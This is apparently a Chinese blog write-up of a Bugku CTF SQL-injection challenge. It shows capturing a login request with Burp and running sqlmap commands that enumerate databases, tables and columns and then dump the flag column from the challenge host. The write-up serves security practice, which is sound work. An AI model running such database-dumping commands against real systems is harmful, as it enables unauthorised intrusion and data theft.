bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)

原创于 2018-11-29 21:01:55 发布 · 604 阅读

CC 4.0 BY-SA版权

文章标签：

14 篇文章

订阅专栏

本文详细介绍了如何使用SQLMap工具进行数据库渗透测试的过程，包括爆破数据库、表、列名及内容，通过实例演示了从目标网站抓取数据的具体步骤。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

题目
http://123.206.87.240:9001/sql/
在这里插入图片描述
随便输入账号密码，然后打开burp进行拦截，并生成该页面的文件，保存到本地

在这里插入图片描述
然后使用sqlmap工具
构造相应语句
首先爆数据库

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs

在这里插入图片描述

继续爆该数据库下的表

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 --tables

在这里插入图片描述

继续爆相应表的列名

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 --columns

在这里插入图片描述

最后爆出列名内容

python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 -C flag1 --dump

在这里插入图片描述

最后得到flag！